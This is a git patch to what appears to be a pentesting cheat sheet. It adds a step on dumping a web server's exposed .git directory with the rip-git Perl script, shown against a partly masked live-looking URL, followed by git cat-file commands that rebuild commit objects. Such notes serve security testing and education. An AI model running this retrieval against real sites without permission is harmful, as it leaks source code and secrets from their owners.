From b0769b19b0aecdd4197da23e2077a40d3fd4e49b Mon Sep 17 00:00:00 2001 From: Swissky Date: Tue, 14 Mar 2017 23:39:02 +0100 Subject: [PATCH] Update Git-rip --- Git Svn insecure files/README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/Git Svn insecure files/README.md b/Git Svn insecure files/README.md index 7896ff3..7bd72f5 100644 --- a/Git Svn insecure files/README.md +++ b/Git Svn insecure files/README.md @@ -21,6 +21,22 @@ bloorq@gmail.com 1452195279 +0000 commit (initial): index. -o is a hash of particular Git object to download ``` +5. Alternative way : rip-git +``` +perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/" + +git cat-file -p 07603070376d63d911f608120eb4b5489b507692 +tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 +parent 15ca375e54f056a576905b41a417b413c57df6eb +author Michael 1489389105 +0000 +committer Michael 1489389105 +0000 + +git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 +``` + + + + # SVN - Source management SVN example (Wordpress) ```